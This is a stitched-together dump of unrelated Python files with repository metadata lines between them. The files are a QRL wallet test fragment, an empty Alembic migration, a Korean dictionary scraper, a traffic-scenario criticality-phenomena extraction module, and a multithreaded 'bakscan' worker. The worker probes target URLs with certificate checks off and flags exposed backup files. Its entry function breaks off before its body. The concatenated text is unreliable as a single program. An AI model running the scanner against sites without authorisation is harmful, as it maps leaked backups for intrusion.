self.assertRaises(WalletDecryptionError): walletd.unlock_wallet(passphrase=self.passphrase) walletd.unlock_wallet(passphrase=passphrase2) qaddresses = walletd.list_address() self.assertEqual(len(qaddresses), 1) self.assertEqual(qaddresses[0], qaddress) def test_get_transactions_by_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd._public_stub.GetTransactionsByAddress = Mock( return_value=qrl_pb2.GetTransactionsByAddressResp(mini_transactions=[], balance=0)) mini_transactions, balance = walletd.get_transactions_by_address(qaddress=get_alice_xmss(4).qaddress) self.assertEqual(len(mini_transactions), 0) self.assertEqual(balance, 0) def test_get_transaction(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() tx = qrl_pb2.Transaction() tx.fee = 10 tx.transaction_hash = b'1234' tx.message.message_hash = b'hello' pk = '01020016ecb9f39b9f4275d5a49e232346a15ae2fa8c50a2927daeac189b8c5f2d1' \ '8bc4e3983bd564298c49ae2e7fa6e28d4b954d8cd59398f1225b08d6144854aee0e' tx.public_key = bytes(hstr2bin(pk)) walletd._public_stub.GetTransaction = Mock( return_value=qrl_pb2.GetTransactionResp(tx=tx, confirmations=10)) tx, confirmations = walletd.get_transaction(tx_hash='1234') self.assertIsNotNone(tx) self.assertEqual(tx.transaction_hash, bin2hstr(b'1234')) self.assertEqual(confirmations, 10) def test_get_balance(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd._public_stub.GetBalance = Mock( return_value=qrl_pb2.GetBalanceResp(balance=1000)) balance = walletd.get_balance(self.qaddress) self.assertEqual(balance, 1000) def test_get_ots(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd._public_stub.GetOTS = Mock( return_value=qrl_pb2.GetOTSResp(ots_bitfield=[b'\x00'] * 10, next_unused_ots_index=1)) ots_bitfield, next_unused_ots_index = walletd.get_ots(self.qaddress) self.assertEqual(ots_bitfield, [b'\x00'] * 10) self.assertEqual(next_unused_ots_index, 1) def test_get_height(self): with set_qrl_dir("wallet_ver1"): walletd 
= WalletD() walletd._public_stub.GetHeight = Mock( return_value=qrl_pb2.GetHeightResp(height=1001)) height = walletd.get_height() self.assertEqual(height, 1001) def test_get_block(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() block = qrl_pb2.Block() block.header.hash_header = b'001122' block.header.block_number = 1 walletd._public_stub.GetBlock = Mock( return_value=qrl_pb2.GetBlockResp(block=block)) b = walletd.get_block('001122') self.assertEqual(b.header.hash_header, bin2hstr(block.header.hash_header)) self.assertEqual(b.header.block_number, block.header.block_number) def test_get_block_by_number(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() block = qrl_pb2.Block() block.header.hash_header = b'001122' block.header.block_number = 1 walletd._public_stub.GetBlockByNumber = Mock( return_value=qrl_pb2.GetBlockResp(block=block)) b = walletd.get_block_by_number(1) self.assertEqual(b.header.hash_header, bin2hstr(block.header.hash_header)) self.assertEqual(b.header.block_number, block.header.block_number) def test_get_address_from_pk(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() pk = '01020016ecb9f39b9f4275d5a49e232346a15ae2fa8c50a2927daeac189b8c5f2d1' \ '8bc4e3983bd564298c49ae2e7fa6e28d4b954d8cd59398f1225b08d6144854aee0e' address = walletd.get_address_from_pk(pk) self.assertEqual(address, 'Q010200670246b0026436b717f199e3ec5320ba6ab61d5eddff811ac199a9e9b871d3280178b343')
23,528
7
994
d1d129d88ef1dad9ac4e5229af7bdc3ff834ffcc
540
py
Python
fbd/migrations/versions/23184a5b4714_.py
olety/FBG
337c81ed661c11ee7283cffff63b1949363a8151
[ "MIT" ]
null
null
null
fbd/migrations/versions/23184a5b4714_.py
olety/FBG
337c81ed661c11ee7283cffff63b1949363a8151
[ "MIT" ]
11
2017-05-26T13:36:09.000Z
2021-08-17T14:37:32.000Z
fbd/migrations/versions/23184a5b4714_.py
olety/FBD
337c81ed661c11ee7283cffff63b1949363a8151
[ "MIT" ]
null
null
null
""" Revision ID: 23184a5b4714 Revises: 2fcbb8a6de94 Create Date: 2017-05-29 17:13:59.813275 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '23184a5b4714' down_revision = '2fcbb8a6de94' branch_labels = None depends_on = None
18.62069
65
0.681481
""" Revision ID: 23184a5b4714 Revises: 2fcbb8a6de94 Create Date: 2017-05-29 17:13:59.813275 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '23184a5b4714' down_revision = '2fcbb8a6de94' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### pass # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### pass # ### end Alembic commands ###
208
0
46
2ec8e0ea45f5424c33d13abaa9c4a1a92f1bdc80
2,011
py
Python
dics/naver.py
jones3kd/Anki-Korean-Lookup-Addon
5fe0717876c042b145bd2d208ad3a510626837e3
[ "MIT" ]
null
null
null
dics/naver.py
jones3kd/Anki-Korean-Lookup-Addon
5fe0717876c042b145bd2d208ad3a510626837e3
[ "MIT" ]
null
null
null
dics/naver.py
jones3kd/Anki-Korean-Lookup-Addon
5fe0717876c042b145bd2d208ad3a510626837e3
[ "MIT" ]
null
null
null
""" To do get hanja get multiple definitions on page example sentences """ from bs4 import BeautifulSoup import urllib.request import urllib.parse import time import re import random defin = [] class NaverDict: """ This class looks up korean vocabulary words using the Naver korean-english dictionary. """ def get_def(self, org_word): """ Looks up the word givein the params and returns a list of tuples of definitons because there may be more than one definition for words. If the definition was not found returns None """ kor_word = None eng_defs = "" eng_def = "" hanja = None #convert word from hangul into the percent characters #example converts korean word to %ED%95%9C%EB%B2%88 word = urllib.parse.quote(org_word) #put word in url url = self.url.replace('[word]', word) #time.sleep(random.randrange(4,10)) html = urllib.request.urlopen(url) soup = BeautifulSoup(html, 'html.parser') #returns a list of tag objects kor_word = soup.find(True, {'class':['first']}) try: kor_word = kor_word.span.a.string eng_defs = soup.find(True, {'class':['list_e2']}).dd.div.p.span #print(eng_def.children) for string in eng_defs.stripped_strings: eng_def += str(string) + " " #eng_def = eng_def.dd.div.p.string except Exception as e: #could not find word in naver dic return None #dont forget to get the hanja if kor_word is None: kor_word = org_word return [(org_word, kor_word, eng_def)] naver_dic = NaverDict() word = input("enter word: ") print(naver_dic.get_def(word))
26.116883
89
0.610144
""" To do get hanja get multiple definitions on page example sentences """ from bs4 import BeautifulSoup import urllib.request import urllib.parse import time import re import random defin = [] class NaverDict: """ This class looks up korean vocabulary words using the Naver korean-english dictionary. """ def __init__(self): #will replace [word] with the actual korean #word we want to query self.url = 'http://endic.naver.com/search.nhn?sLn=en&isOnlyViewEE=N&query=[word]' def get_def(self, org_word): """ Looks up the word givein the params and returns a list of tuples of definitons because there may be more than one definition for words. If the definition was not found returns None """ kor_word = None eng_defs = "" eng_def = "" hanja = None #convert word from hangul into the percent characters #example converts korean word to %ED%95%9C%EB%B2%88 word = urllib.parse.quote(org_word) #put word in url url = self.url.replace('[word]', word) #time.sleep(random.randrange(4,10)) html = urllib.request.urlopen(url) soup = BeautifulSoup(html, 'html.parser') #returns a list of tag objects kor_word = soup.find(True, {'class':['first']}) try: kor_word = kor_word.span.a.string eng_defs = soup.find(True, {'class':['list_e2']}).dd.div.p.span #print(eng_def.children) for string in eng_defs.stripped_strings: eng_def += str(string) + " " #eng_def = eng_def.dd.div.p.string except Exception as e: #could not find word in naver dic return None #dont forget to get the hanja if kor_word is None: kor_word = org_word return [(org_word, kor_word, eng_def)] naver_dic = NaverDict() word = input("enter word: ") print(naver_dic.get_def(word))
171
0
27
05a2e39a60bc35bf0b3e55b2cd50b1737d5d4513
17,967
py
Python
criticality_recognition/phenomena_extraction.py
lu-w/criticality-recognition
5ad2e12699ad4bf2d7f60ce9e30f26110adce436
[ "MIT" ]
4
2022-03-13T19:33:43.000Z
2022-03-15T22:20:36.000Z
criticality_recognition/phenomena_extraction.py
lu-w/criticality-recognition
5ad2e12699ad4bf2d7f60ce9e30f26110adce436
[ "MIT" ]
null
null
null
criticality_recognition/phenomena_extraction.py
lu-w/criticality-recognition
5ad2e12699ad4bf2d7f60ce9e30f26110adce436
[ "MIT" ]
null
null
null
import logging import owlready2 import tqdm import auto.auto logger = logging.getLogger(__name__) _CACHED_CP_CLASSES = dict() class Scene_Criticality_Phenomenon(Criticality_Phenomenon): """ Concretization for scene-level criticality phenomena. Note that member traffic_model is a list of scenes. """ class Scenario_Criticality_Phenomenon(Criticality_Phenomenon): """ Concretization for scenario-level criticality phenomena. """ def phenomena_scenario(scenario: list or owlready2.World) -> list: """ scenario: Either a list of worlds, each world representing a single scene or a single world representing a whole scenario returns: A list of criticality phenomena objects (either scene or scenario) sorted by temporal occurrence """ cps = [] if type(scenario) == list: for scene in scenario: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, scene) cp_ont = auto.auto.get_ontology(auto.auto.Ontology.Criticality_Phenomena, scene) scenes = list(tm.search(type=tm.Scene)) if len(scenes) > 0: for scene_cp in scenario.search(type=cp_ont.Criticality_Phenomenon): scene_cp_obj = Scene_Criticality_Phenomenon(scenes[0], scene_cp, None) # TODO cps.append(scene_cp_obj) else: raise ValueError("No scenes found in scene world " + str(scene)) elif type(scenario) == owlready2.World: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, scenario) ac = auto.auto.get_ontology(auto.auto.Ontology.Act, scenario) ti = auto.auto.get_ontology(auto.auto.Ontology.Time, scenario) cp_ont = auto.auto.get_ontology(auto.auto.Ontology.Criticality_Phenomena, scenario) scenarios = list(scenario.search(type=tm.Scenario)) if len(scenarios) > 0: if logger.level == logging.DEBUG: search_space = tqdm.tqdm(list(scenario.search(type=cp_ont.Criticality_Phenomenon))) else: search_space = scenario.search(type=cp_ont.Criticality_Phenomenon) for cp in search_space: cp_clss = list(filter(lambda x: x in scenario.classes(), [y for y in cp.INDIRECT_is_a if hasattr(y, "namespace") and y.namespace.base_iri == 
"http://purl.org/auto/criticality_phenomena#"])) most_specific_cp_clss = [cp_cls for cp_cls in cp_clss if hasattr(cp_cls, "__subclasses__") and len(set(cp_cls.__subclasses__()).intersection(set(cp_clss))) == 0] for cp_cls in most_specific_cp_clss: objects = [None] if len(cp_cls.object_extraction_code) > 0: try: local_dict = {"subject": cp, "subjects": []} exec(cp_cls.object_extraction_code[0], globals(), local_dict) objects = local_dict["objects"] or [] except Exception as e: logger.error("Invalid object extraction code in OWL during CP extraction of: " + str(cp) + " (" + str(cp_cls) + "): " + str(e)) for object_dict in objects: if set(cp.INDIRECT_is_a).intersection({ac.Activity, ti.Interval}): scenario_cp_obj = Scenario_Criticality_Phenomenon(scenarios[0], cp, cp_cls, object_dict) cps.append(scenario_cp_obj) elif len(cp.in_traffic_model) > 0 and tm.Scene in cp.in_traffic_model[0].INDIRECT_is_a: scene_cp_obj = Scene_Criticality_Phenomenon(cp.in_traffic_model, cp, cp_cls, object_dict) cps.append(scene_cp_obj) else: raise ValueError("CP with no scene or scenario found: " + str(cp)) else: raise ValueError("No scenario found in scenario world " + str(scenario)) else: raise ValueError("Wrong scenario type: neither a list nor a world, but found " + str(type(scenario))) cps.sort(key=lambda x: x.time if type(x) is Scene_Criticality_Phenomenon else x.time[0]) return cps def list_cps(cps: list, output_format="natural", world=None, print_non_visualizable_info=False) -> str: """ Lists the given criticality phenomena in a given output format. If a world is given, checks if the phenomena are visualizable in the traffic model of the world. If format is natural, it returns a string of lines where each line represents the string represention of the CP. If format is csv, it returns a string of ;-separated CSV lines including a file header of the format 'Start Time;End Time;Criticality Phenomenon;Subject(s);Object(s)[;Visualizable In Scene]'. 
:param cps: A list of criticality phenomena :param output_format: "natural" or ("csv" or "csv-file" (no difference)) :param world: The world with the traffic model of the CP list :param print_non_visualizable_info: Whether to check if CPs :return: A string with each line representing a criticality phenomenon """ output = "" scene_cps = [] if print_non_visualizable_info and world: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, world) scenes = list(filter(lambda x: tm.Scene in x.is_a, world.search(type=tm.Scenario)[0].has_traffic_model)) for scene in scenes: scene_cps += [cp for cp in cps if cp.is_representable_in_scene(scene)] if output_format == "natural": output += "Result:\n" elif output_format == "csv" or output_format == "csv-file": csv_header = "Start Time;End Time;Criticality Phenomenon;Subject(s);Object(s)" if print_non_visualizable_info and world: csv_header += ";Visualizable In Scene" output += csv_header + "\n" if len(cps) > 0: for cp in cps: if output_format == "natural": visualizable = "" if print_non_visualizable_info and world: if cp not in scene_cps: visualizable = "[Non visualizable] " output += visualizable + str(cp) + "\n" elif output_format == "csv" or output_format == "csv-file": visualizable = "" if print_non_visualizable_info and world: visualizable = ";" + str(cp in scene_cps) output += cp.to_csv() + visualizable + "\n" elif output_format == "natural": output += "No criticality phenomenon found.\n" return output[:-1] def _get_individual_id(individual) -> str: """ Returns a unique identifier as string for the given individual. :param individual: The individual to get the ID for. :return: A string representing the ID. 
""" if hasattr(individual, "identifier") and (isinstance(individual.identifier, list) and len(individual.identifier) > 0 and type(individual.identifier[0]) in [int, str]) or ( type(individual.identifier) in [int, str]): return str(individual.identifier[0]) else: return str(individual) def get_most_specific_classes(list_of_individuals, caching=True): """ Helper function that looks up the subsumption hierarchy and returns the most specific classes of a list of individuals(i.e. removes all classes that are a parent of some class of the individuals). It looks only at the subsumption hierarchy spanned by the domain (L1-L6) and perception, physics, and act ontologies. :param list_of_individuals: A list of individuals :return: A list of tuples containing the individual in the first entry and a list of most specific classes in the second entry (as strings) """ res = [] noncached_list_of_individuals = [] if caching: for i in list_of_individuals: if i in _CACHED_CP_CLASSES.keys(): i_id = _get_individual_id(i) res.append((i_id, _CACHED_CP_CLASSES[i])) else: noncached_list_of_individuals.append(i) relevant_iris = [auto.auto.Ontology.L1_Core.value, auto.auto.Ontology.L2_Core.value, auto.auto.Ontology.L3_Core.value, auto.auto.Ontology.L4_Core.value, auto.auto.Ontology.L5_Core.value, auto.auto.Ontology.L6_Core.value, auto.auto.Ontology.L1_DE.value, auto.auto.Ontology.L2_DE.value, auto.auto.Ontology.L3_DE.value, auto.auto.Ontology.L4_DE.value, auto.auto.Ontology.L5_DE.value, auto.auto.Ontology.L6_DE.value] relevant_additional_iris = [auto.auto.Ontology.Perception.value, auto.auto.Ontology.Physics.value, auto.auto.Ontology.Act.value] for individual in noncached_list_of_individuals: relevant_classes = [x for x in individual.namespace.ontology.classes() if x.namespace.base_iri in relevant_iris] relevant_additional_classes = [x for x in individual.namespace.ontology.classes() if x.namespace.base_iri in relevant_additional_iris] individual_clss = list(filter(lambda x: x in 
relevant_classes, individual.INDIRECT_is_a)) if len(individual_clss) == 0: # Retry finding something outside of domain ontologies, e.g. physics individual_clss = list(filter(lambda x: x in relevant_additional_classes, individual.INDIRECT_is_a)) individual_id = _get_individual_id(individual) most_specific_individual_clss = [str(individual_cls) for individual_cls in individual_clss if hasattr(individual_cls, "__subclasses__") and len( set(individual_cls.__subclasses__()).intersection(set(individual_clss))) == 0] res.append((individual_id, most_specific_individual_clss)) if caching: _CACHED_CP_CLASSES[individual] = most_specific_individual_clss return res
53.31454
120
0.611009
import logging import owlready2 import tqdm import auto.auto logger = logging.getLogger(__name__) _CACHED_CP_CLASSES = dict() class Criticality_Phenomenon: def __init__(self, traffic_model, cp, cp_cls, objects=None): """ Constructor for criticality phenomena. Information about criticality phenomena are stored as follows: - traffic_model: The scene or scenario in which the CP occurs. - cp: The CP individual from the ontology (owlready2 object). - cp_cls: The class of the criticality phenomenon from the ontology (owlready2 class). - time: Either an interval tuple (start, end) or a time point as float. - subjects: A list of subjects (individuals within the ontology) of the CP. - objects: A dictionary mapping object properties to lists of objects (individuals within the ontology), e.g. {"prop1": [obj1, obj2], "prop2": [obj2, obj3]}. :param traffic_model: The scene or scenario in which the criticality phenomenon occurs. :param cp: An individual from the ABox that is a criticality phenomenon :param cp_cls: The class of the TBox of the criticality phenomenon (i.e. of cp) :param objects: If the objects of the criticality phenomenon were already extracted previously, they can be passed here as a dict, assigning each object property (str) a list of objects, e.g. {"prop1": [obj1, obj2], "prop2": [obj2, obj3]}. If None is given, objects will be extracted in the constructor. 
""" self.traffic_model = traffic_model self.cp = cp self.cp_cls = cp_cls self.time = 0 ac = auto.auto.get_ontology(auto.auto.Ontology.Act, self.cp.namespace.world) # Subjects if len(self.cp_cls.subject_extraction_code) > 0: try: local_dict = {"subject": self.cp, "subjects": []} exec(self.cp_cls.subject_extraction_code[0], globals(), local_dict) self.subjects = local_dict["subjects"] or [] except Exception as e: logger.error("Invalid subject extraction code in OWL during CP extraction of: " + str(self.cp) + " (" + str(self.cp_cls) + "): " + str(e)) self.subjects = [] elif ac.Activity in self.cp.INDIRECT_is_a and len(self.cp.conducted_by) > 0: self.subjects = self.cp.conducted_by else: self.subjects = [self.cp] # Predicate self.predicate = str(self.cp_cls).replace("criticality_phenomena.", "") if len(self.cp_cls.label.en) > 0: self.predicate += " (" + self.cp_cls.label.en[0] + ")" # Objects if objects is None and len(self.cp_cls.object_extraction_code) > 0: try: local_dict = {"subject": self.cp, "objects": []} exec(self.cp_cls.object_extraction_code[0], globals(), local_dict) self.objects = local_dict["objects"] or [] except Exception as e: logger.error("Invalid object extraction code in OWL during CP extraction of: " + str(self.cp) + " (" + str(self.cp_cls) + "): " + str(e)) self.objects = [] elif objects is None and ac.Activity in self.cp.INDIRECT_is_a: self.objects = {"participants": self.cp.has_participant} else: self.objects = objects or dict() def __str__(self) -> str: """ Returns a string representation of the criticality phenomenon in the form 't = X: subject(s) -- predicate --> object(s)'. :return: String representation as described above. 
""" # Time label = "t = " + str(self.at_time()) + ": " # Subjects if len(self.subjects) > 0: subj_and_classes = get_most_specific_classes(self.subjects) label += ", ".join([str(x[0]) + " (" + ", ".join(x[1]) + ")" for x in subj_and_classes]) + " -- " # Predicate label += self.predicate # Objects for obj_predicate in self.objects.keys(): obj_and_classes = get_most_specific_classes(self.objects[obj_predicate]) label += " -- " + obj_predicate + " --> " + ", ".join([str(x[0]) + " (" + ", ".join(x[1]) + ")" for x in obj_and_classes]) return label def to_csv(self) -> str: """ Returns a CSV representation (semicolon-separated) of the criticality phenomenon in the form 'time; predicate; subject(s); object(s)'. :return: CSV as a string as described above """ # Time time = self.at_time() if isinstance(time, tuple): start, end = time else: start, end = time, time csv_res = str(start) + ";" + str(end) + ";" # Predicate csv_res += self.predicate + ";" # Subjects if len(self.subjects) > 0: subj_and_classes = get_most_specific_classes(self.subjects) csv_res += ", ".join([str(x[0]) + " (" + ", ".join(x[1]) + ")" for x in subj_and_classes]) csv_res += ";" # Objects for obj_predicate in self.objects.keys(): obj_and_classes = get_most_specific_classes(self.objects[obj_predicate]) csv_res += obj_predicate + ": " + ", ".join([str(x[0]) + " (" + ", ".join(x[1]) + ")" for x in obj_and_classes]) + " | " if csv_res.endswith(" | "): csv_res = csv_res[:-3] return csv_res def at_time(self): """ Interface: returns the time at which the criticality phenomenon is occurring. :return: The time at which self occurs. """ return self.time def is_representable_in_scene(self, scene) -> bool: """ Returns True iff the criticality phenomenon is visualizable or representable in a given scene, i.e. iff all subjects and objects of the phenomenon are within the scene. :param scene: The scene to check against. :return: True iff self is representable in scene. 
""" if len(self.subjects) > 0: for subj in self.subjects + [y for x in self.objects.values() for y in x]: if scene not in subj.in_traffic_model: return False return True return False class Scene_Criticality_Phenomenon(Criticality_Phenomenon): """ Concretization for scene-level criticality phenomena. Note that member traffic_model is a list of scenes. """ def __init__(self, traffic_model: list, cp, cp_cls, objects=None): if len(traffic_model) == 0: raise ValueError("Scene CP with scenes") Criticality_Phenomenon.__init__(self, traffic_model, cp, cp_cls, objects) self.time = traffic_model[0].inTimePosition[0].numericPosition[0] class Scenario_Criticality_Phenomenon(Criticality_Phenomenon): """ Concretization for scenario-level criticality phenomena. """ def __init__(self, traffic_model, cp, cp_cls, objects=None): Criticality_Phenomenon.__init__(self, traffic_model, cp, cp_cls, objects) if hasattr(self.cp, "hasBeginning") and hasattr(self.cp, "hasEnd") and len(self.cp.hasBeginning) > 0 and \ len(self.cp.hasBeginning[0].inTimePosition) > 0 and \ len(self.cp.hasBeginning[0].inTimePosition[0].numericPosition) > 0 and len(self.cp.hasEnd) > 0 and \ len(self.cp.hasEnd[0].inTimePosition) > 0 and \ len(self.cp.hasEnd[0].inTimePosition[0].numericPosition) > 0: self.time = (self.cp.hasBeginning[0].inTimePosition[0].numericPosition[0], self.cp.hasEnd[0].inTimePosition[0].numericPosition[0]) else: self.time = (self.traffic_model.hasBeginning[0].inTimePosition[0].numericPosition[0], self.traffic_model.hasEnd[0].inTimePosition[0].numericPosition[0]) def phenomena_scenario(scenario: list or owlready2.World) -> list: """ scenario: Either a list of worlds, each world representing a single scene or a single world representing a whole scenario returns: A list of criticality phenomena objects (either scene or scenario) sorted by temporal occurrence """ cps = [] if type(scenario) == list: for scene in scenario: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, scene) cp_ont = 
auto.auto.get_ontology(auto.auto.Ontology.Criticality_Phenomena, scene) scenes = list(tm.search(type=tm.Scene)) if len(scenes) > 0: for scene_cp in scenario.search(type=cp_ont.Criticality_Phenomenon): scene_cp_obj = Scene_Criticality_Phenomenon(scenes[0], scene_cp, None) # TODO cps.append(scene_cp_obj) else: raise ValueError("No scenes found in scene world " + str(scene)) elif type(scenario) == owlready2.World: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, scenario) ac = auto.auto.get_ontology(auto.auto.Ontology.Act, scenario) ti = auto.auto.get_ontology(auto.auto.Ontology.Time, scenario) cp_ont = auto.auto.get_ontology(auto.auto.Ontology.Criticality_Phenomena, scenario) scenarios = list(scenario.search(type=tm.Scenario)) if len(scenarios) > 0: if logger.level == logging.DEBUG: search_space = tqdm.tqdm(list(scenario.search(type=cp_ont.Criticality_Phenomenon))) else: search_space = scenario.search(type=cp_ont.Criticality_Phenomenon) for cp in search_space: cp_clss = list(filter(lambda x: x in scenario.classes(), [y for y in cp.INDIRECT_is_a if hasattr(y, "namespace") and y.namespace.base_iri == "http://purl.org/auto/criticality_phenomena#"])) most_specific_cp_clss = [cp_cls for cp_cls in cp_clss if hasattr(cp_cls, "__subclasses__") and len(set(cp_cls.__subclasses__()).intersection(set(cp_clss))) == 0] for cp_cls in most_specific_cp_clss: objects = [None] if len(cp_cls.object_extraction_code) > 0: try: local_dict = {"subject": cp, "subjects": []} exec(cp_cls.object_extraction_code[0], globals(), local_dict) objects = local_dict["objects"] or [] except Exception as e: logger.error("Invalid object extraction code in OWL during CP extraction of: " + str(cp) + " (" + str(cp_cls) + "): " + str(e)) for object_dict in objects: if set(cp.INDIRECT_is_a).intersection({ac.Activity, ti.Interval}): scenario_cp_obj = Scenario_Criticality_Phenomenon(scenarios[0], cp, cp_cls, object_dict) cps.append(scenario_cp_obj) elif len(cp.in_traffic_model) > 0 and tm.Scene in 
cp.in_traffic_model[0].INDIRECT_is_a: scene_cp_obj = Scene_Criticality_Phenomenon(cp.in_traffic_model, cp, cp_cls, object_dict) cps.append(scene_cp_obj) else: raise ValueError("CP with no scene or scenario found: " + str(cp)) else: raise ValueError("No scenario found in scenario world " + str(scenario)) else: raise ValueError("Wrong scenario type: neither a list nor a world, but found " + str(type(scenario))) cps.sort(key=lambda x: x.time if type(x) is Scene_Criticality_Phenomenon else x.time[0]) return cps def list_cps(cps: list, output_format="natural", world=None, print_non_visualizable_info=False) -> str: """ Lists the given criticality phenomena in a given output format. If a world is given, checks if the phenomena are visualizable in the traffic model of the world. If format is natural, it returns a string of lines where each line represents the string represention of the CP. If format is csv, it returns a string of ;-separated CSV lines including a file header of the format 'Start Time;End Time;Criticality Phenomenon;Subject(s);Object(s)[;Visualizable In Scene]'. 
:param cps: A list of criticality phenomena :param output_format: "natural" or ("csv" or "csv-file" (no difference)) :param world: The world with the traffic model of the CP list :param print_non_visualizable_info: Whether to check if CPs :return: A string with each line representing a criticality phenomenon """ output = "" scene_cps = [] if print_non_visualizable_info and world: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, world) scenes = list(filter(lambda x: tm.Scene in x.is_a, world.search(type=tm.Scenario)[0].has_traffic_model)) for scene in scenes: scene_cps += [cp for cp in cps if cp.is_representable_in_scene(scene)] if output_format == "natural": output += "Result:\n" elif output_format == "csv" or output_format == "csv-file": csv_header = "Start Time;End Time;Criticality Phenomenon;Subject(s);Object(s)" if print_non_visualizable_info and world: csv_header += ";Visualizable In Scene" output += csv_header + "\n" if len(cps) > 0: for cp in cps: if output_format == "natural": visualizable = "" if print_non_visualizable_info and world: if cp not in scene_cps: visualizable = "[Non visualizable] " output += visualizable + str(cp) + "\n" elif output_format == "csv" or output_format == "csv-file": visualizable = "" if print_non_visualizable_info and world: visualizable = ";" + str(cp in scene_cps) output += cp.to_csv() + visualizable + "\n" elif output_format == "natural": output += "No criticality phenomenon found.\n" return output[:-1] def _get_individual_id(individual) -> str: """ Returns a unique identifier as string for the given individual. :param individual: The individual to get the ID for. :return: A string representing the ID. 
""" if hasattr(individual, "identifier") and (isinstance(individual.identifier, list) and len(individual.identifier) > 0 and type(individual.identifier[0]) in [int, str]) or ( type(individual.identifier) in [int, str]): return str(individual.identifier[0]) else: return str(individual) def get_most_specific_classes(list_of_individuals, caching=True): """ Helper function that looks up the subsumption hierarchy and returns the most specific classes of a list of individuals(i.e. removes all classes that are a parent of some class of the individuals). It looks only at the subsumption hierarchy spanned by the domain (L1-L6) and perception, physics, and act ontologies. :param list_of_individuals: A list of individuals :return: A list of tuples containing the individual in the first entry and a list of most specific classes in the second entry (as strings) """ res = [] noncached_list_of_individuals = [] if caching: for i in list_of_individuals: if i in _CACHED_CP_CLASSES.keys(): i_id = _get_individual_id(i) res.append((i_id, _CACHED_CP_CLASSES[i])) else: noncached_list_of_individuals.append(i) relevant_iris = [auto.auto.Ontology.L1_Core.value, auto.auto.Ontology.L2_Core.value, auto.auto.Ontology.L3_Core.value, auto.auto.Ontology.L4_Core.value, auto.auto.Ontology.L5_Core.value, auto.auto.Ontology.L6_Core.value, auto.auto.Ontology.L1_DE.value, auto.auto.Ontology.L2_DE.value, auto.auto.Ontology.L3_DE.value, auto.auto.Ontology.L4_DE.value, auto.auto.Ontology.L5_DE.value, auto.auto.Ontology.L6_DE.value] relevant_additional_iris = [auto.auto.Ontology.Perception.value, auto.auto.Ontology.Physics.value, auto.auto.Ontology.Act.value] for individual in noncached_list_of_individuals: relevant_classes = [x for x in individual.namespace.ontology.classes() if x.namespace.base_iri in relevant_iris] relevant_additional_classes = [x for x in individual.namespace.ontology.classes() if x.namespace.base_iri in relevant_additional_iris] individual_clss = list(filter(lambda x: x in 
relevant_classes, individual.INDIRECT_is_a)) if len(individual_clss) == 0: # Retry finding something outside of domain ontologies, e.g. physics individual_clss = list(filter(lambda x: x in relevant_additional_classes, individual.INDIRECT_is_a)) individual_id = _get_individual_id(individual) most_specific_individual_clss = [str(individual_cls) for individual_cls in individual_clss if hasattr(individual_cls, "__subclasses__") and len( set(individual_cls.__subclasses__()).intersection(set(individual_clss))) == 0] res.append((individual_id, most_specific_individual_clss)) if caching: _CACHED_CP_CLASSES[individual] = most_specific_individual_clss return res
1,227
6,336
75
fb774c8a7a6083cfa0aad97f1b5c322164dcbec0
3,818
py
Python
bakthread.py
ifuzx/bakscan
3d5e36a390b65e29fe89ec1578bda13f9ac92406
[ "Unlicense" ]
null
null
null
bakthread.py
ifuzx/bakscan
3d5e36a390b65e29fe89ec1578bda13f9ac92406
[ "Unlicense" ]
null
null
null
bakthread.py
ifuzx/bakscan
3d5e36a390b65e29fe89ec1578bda13f9ac92406
[ "Unlicense" ]
null
null
null
import re import requests import threading import queue as Queue from requests.packages.urllib3.exceptions import InsecureRequestWarning
33.491228
138
0.499214
import re
import requests
import threading
import queue as Queue
from requests.packages.urllib3.exceptions import InsecureRequestWarning


class myThread(threading.Thread):
    """Worker thread that repeatedly pulls candidate URLs off a shared queue
    and probes them via bakburp() until the queue stays empty for 10 seconds.
    """

    def __init__(self, name, q):
        threading.Thread.__init__(self)
        self.name = name
        self.q = q

    def run(self):
        while True:
            try:
                bakburp(self.name, self.q)
            # queue.Empty (q.get timeout) is the normal stop signal; any other
            # per-URL failure also stops this worker, matching prior behavior.
            # Fixed: was a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt and made Ctrl-C unreliable.
            except Exception:
                break


def bakburp(threadName, q):
    """Probe one URL taken from queue `q` and report whether a backup file
    appears to exist there.

    :param threadName: name of the calling worker (kept for signature
        compatibility; not used in the probe itself).
    :param q: queue.Queue of candidate URLs; raises queue.Empty out of this
        function after a 10s idle timeout, which terminates the worker.
    """
    geturl = q.get(timeout=10)
    try:
        # Self-signed / invalid certs are expected on scan targets; silence
        # the per-request warning noise.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        conn = requests.get(geturl, verify=False, allow_redirects=False, timeout=30)
        try:
            conn.encoding = 'utf-8'
            status = conn.status_code
            if status == 200:
                size = len(conn.content)
                if size < 1000000:
                    # Small bodies are often soft-404 pages -> flag as a
                    # probable false positive (可能误报).
                    print('\r' + '\033[33m[*]\033[33mCode:%s -----(可能误报)--大小:%s ----- 目标:%s \n' % (status, size, geturl), end='', flush=True)
                else:
                    print('\r' + '\033[32m[*]\033[32m Code:%s ----- 文件存在--大小:%s ----- 目标:%s \n' % (status, size, geturl), end='', flush=True)
            else:
                # Non-200: just tick over the progress line.
                print('\r' + geturl + '\r', end='', flush=True)
        finally:
            # Fixed: the response was previously leaked on the exception path.
            conn.close()
    except Exception:
        # Network errors are expected during a scan; keep the progress line
        # moving instead of crashing the worker.
        print('\r' + geturl + '\r', end='', flush=True)


def run():
    """Read target hosts from ./runoob.txt, expand each into candidate backup
    URLs (generic names plus domain-derived archive names), then scan them
    with a pool of worker threads.
    """
